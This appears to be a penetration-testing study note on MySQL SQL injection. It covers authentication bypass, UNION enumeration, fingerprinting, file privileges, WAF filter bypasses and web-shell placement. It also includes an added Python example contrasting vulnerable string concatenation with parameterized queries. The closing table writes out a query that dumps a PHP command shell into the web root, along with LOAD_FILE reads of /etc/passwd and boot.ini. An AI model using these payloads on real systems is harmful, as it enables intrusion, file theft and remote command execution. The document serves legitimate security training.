SQL Injection
SQLi Discovery
Payload | URL Encoded |
---|---|
Authentication Bypass
Comments
We can use two types of line comments with MySQL, -- and #, in addition to the in-line comment /**/.
Auth Bypass with comments
Put a space after -- : MySQL only treats -- as a comment when it is followed by whitespace, so a bare -- at the end of the payload will not work.
Union
Detect the number of columns using ORDER BY, increasing the column number until we reach one that returns an error. The last number that succeeds is the column count; in the example shown, this means that this table has exactly 4 columns.
While a query may return multiple columns, the web application may only display some of them. So, if we inject our query in a column that is not printed on the page, we will not get its output. This is why we need to determine which columns are printed to the page, to determine where to place our injection.
We cannot place our injection at the beginning, or its output will not be printed.
Database Enumeration
Fingerprinting
Payload | When to Use | Expected Output | Wrong Output |
---|---|---|---|
| When we have full query output | MySQL Version 'i.e. | In MSSQL it returns MSSQL version. Error with other DBMS. |
| When we only have numeric output | | Error with other DBMS |
| Blind/No Output | Delays page response for 5 seconds and returns | Will not delay response with other DBMS |
Database
Find the current database with the SELECT database() query.
Tables
Columns
Data
Remember: don't forget to use the dot operator to refer to the 'credentials' in the 'dev' database, as we are running in the 'ilfreight' database, as previously discussed.
Reading Files
MySQL (3306)
DB User
User Privileges
Y = yes, super_priv
If we had many users within the DBMS:
Other privileges:
The FILE privilege is listed for our user, enabling us to read files and potentially even write files.
Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.
Write Files
To be able to write files to the back-end server using a MySQL database, we require three things:
- a user with the FILE privilege enabled
- the MySQL global secure_file_priv variable not enabled
- write access to the location we want to write to on the back-end server
Here the secure_file_priv value is empty, meaning that we can read/write files to any location.
Tip: Advanced file exports utilize the 'FROM_BASE64("base64_data")' function in order to be able to write long/advanced files, including binary data.
Web Shell
Note: To write a web shell, we must know the base web directory for the web server (i.e. web root). One way to find it is to use load_file to read the server configuration, like Apache's configuration found at /etc/apache2/apache2.conf, Nginx's configuration at /etc/nginx/nginx.conf, or IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.config, or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using this wordlist for Linux or this wordlist for Windows. Finally, if none of the above works, we can use server errors displayed to us and try to find the web directory that way.
Resources
Payload
More than CPTS
Fragmented SQL Injection - two endpoints
Let’s take a look at an instance where the single quote is blacklisted or escaped from the command.
As you see in this example, because the single quote (‘) is escaped with a backslash, the payload does not work as intended by the hacker.
The backslash neutralizes the single quote that follows it, so the value of the username column now ends with the single quote that comes right after password= (the end of the gray text). This swallows the password comparison entirely. Because of the OR 1 condition, the WHERE clause always evaluates to ‘true’, and the # (hash) comments out the rest of the query, so you can bypass the login control and the login form.
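The comment-based auth bypass and the escaped-quote case above both depend on user input being spliced into the SQL text. As an added example (not code from the original cheat sheet), the constructed snippet below builds a throwaway SQLite user table standing in for MySQL and checks a login both ways; make_db, login_concat and login_param are hypothetical names, and SQLite is assumed to accept the same -- line comment as MySQL.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table standing in for the application DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return conn


def login_concat(conn, username, password):
    """Vulnerable pattern: input is pasted into the SQL string, so a quote
    followed by a line comment (the '-- ' trick above) truncates the query
    before the password check is ever evaluated."""
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_param(conn, username, password):
    """Hardened pattern: placeholders ship the values separately from the
    SQL text, so quotes, comments and backslashes in the input are plain
    data that must literally match a stored username."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    crafted = "admin'-- "          # quote plus line comment, as on the page
    print("concat, crafted input :", login_concat(db, crafted, "wrong"))
    print("param,  crafted input :", login_param(db, crafted, "wrong"))
    print("param,  real password :", login_param(db, "admin", "S3cret!"))
```

Escaping quotes (the backslash approach in the fragmented-injection example) only patches one character; binding parameters removes the string-building step that makes every such bypass possible.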
Bypass - WAF / Filters
No Space (%20) - bypass using whitespace alternatives
No Whitespace - bypass using comments
No Whitespace - bypass using parentheses
No Comma - bypass using OFFSET, FROM and JOIN
Keyword blacklist - bypass by mixing uppercase and lowercase
Case-insensitive keyword blacklist - bypass using an equivalent operator
Information_schema.tables alternative
Version alternative
Source:
Reading / Writing Files
Requires privileged user
Description | Query |
---|---|
Dump to file | SELECT * FROM mytable INTO dumpfile '/tmp/somefile' |
Dump PHP Shell | SELECT 'system($_GET['c']); ?>' INTO OUTFILE '/var/www/shell.php' |
Read File | SELECT LOAD_FILE('/etc/passwd') |
Read File Obfuscated | SELECT LOAD_FILE(0x633A5C626F6F742E696E69) reads c:\boot.ini |
File Privileges | SELECT file_priv FROM mysql.user WHERE user = 'netspi'; SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%netspi%' |
Resources
Payload
Tools
SQLMAP